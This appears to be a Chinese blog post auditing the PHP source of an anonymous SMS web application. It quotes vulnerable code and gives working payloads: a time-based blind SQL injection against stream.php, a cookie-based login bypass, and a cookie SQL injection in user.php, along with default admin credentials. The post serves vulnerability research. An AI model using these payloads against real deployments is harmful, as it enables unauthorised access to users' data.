“小月云匿名短信系统源码V2.0”审计
2024-05-10 |

0x01 起因

无聊找网上源码审计,看到这个匿名信的UI干净整洁好看,想着试试审计看看

网上实在找不到资产,只能自己搭建一个了

0x02 源码搭建

  1. 首先导入数据库

  2. 然后修改数据库\lib\config.php

  3. 配置Nginx伪静态:

    rewrite ^/stream$ /stream.php;
rewrite ^/status /status.php;

  4. 后台 /admin admin/123456

  5. 短信计划任务监控地址

    http://你的域名/other/jk.php

    直接放到宝塔设置半个小时执行一次就可以了

0x03 SQL注入 * 1

不是mvc框架的,所以直接访问就好了

在 stream.php 下存在多处Sql注入

<?php
header('Content-Type: text/html;charset=utf-8');
header('Access-Control-Allow-Origin:*'); 
header('Access-Control-Allow-Methods:POST,GET,OPTIONS,DELETE');
require('./lib/init.php');
$hfnr = $_POST['content'];
$appid = $_POST['apiid'];
$sql = "select huixin from nmdx_list where suijistr='$appid'";
$hfxinxi = $mysql->getOne($sql);
$sql = "select huixinshijian from nmdx_list where suijistr='$appid'";
$huixinshijianss = $mysql->getOne($sql);
if($hfxinxi == ''){
    $sql = "update nmdx_list set huixin='$hfnr' where suijistr='$appid'";
    $mysql->query($sql);
    $huixinshijian = date("Y-m-d H:i:s");
    $sql = "update nmdx_list set huixinshijian='$huixinshijian' where suijistr='$appid'";
    $mysql->query($sql);
    exit();
}
$hfxinxi = $hfxinxi . '我是分割' . $hfnr;
$sql = "update nmdx_list set huixin='$hfxinxi' where suijistr='$appid'";
$mysql->query($sql);
$huixinshijianss = $huixinshijianss . '我是分割' . date("Y-m-d H:i:s");
$sql = "update nmdx_list set huixinshijian='$huixinshijianss' where suijistr='$appid'";
$mysql->query($sql);
?>

这里只举例一个payload

POST /stream.php HTTP/1.1

 apiid=1  ' AND (SELECT 6230 FROM (SELECT(SLEEP(5)))rxWg) AND 'fanJ'='fanJ

0x04 SQL注入 * 2

在 status.php 下

<?php
header('Content-Type: text/html;charset=utf-8');
header('Access-Control-Allow-Origin:*');
header('Access-Control-Allow-Methods:POST,GET,OPTIONS,DELETE');
require('./lib/init.php');
$cwnr = $_POST['remarks'];
$appid = $_POST['apiid'];
$sql = "update nmdx_list set shifoufasong='2' where suijistr='$appid'";
$mysql->query($sql);

if($cwnr == '黑名单'){
    $cwnr = '匿名短信已经被对方拉入黑名单';
}
$sql = "update nmdx_list set sbyy='$cwnr' where suijistr='$appid'";
$mysql->query($sql);
?>

很明显这里的 $appid 依旧存在注入

payload就不举例了

0x05 用户登录绕过

例如访问 faxin.php 的时候,如果没登陆会跳转到 re.php 让你登录

<?php
$sfyjdl = $_COOKIE['dengluname'];
if(empty($sfyjdl)){
    header("Location: re.php");
}

写这个的人也是nt,用cookie去判断

直接cookieBypass

payload

cookie: dengluname=1;

0x06 Cookie注入

在 user.php 下

<?php
$dqyhip = getIp();
$sfyjdl = $_COOKIE['dengluname'];
if(empty($sfyjdl)){
    header("Location: re.php");
}
$shoujihao = $_COOKIE['dengluname'];
$sql = "select * from nmdx_user where shoujihao='$shoujihao'";
$syxx = $mysql->getRow($sql);
$sydxed = $syxx['sydxedu'];
$yydxed = $syxx['yfdx'];
?>

很明显,得结合前面的用户登录绕过,然后进行sql注入

payload

GET /user.php HTTP/1.1
cookie: dengluname=1; dengluname=*

还有更多洞,难得挖了,因为其他后台等源码进行了简单的加密,懒得解密了,有空以后再看看

标签: / 代码审计 / PHP
Copyright © Hello Hehanzzz~ Powered by Hexo with ZenMind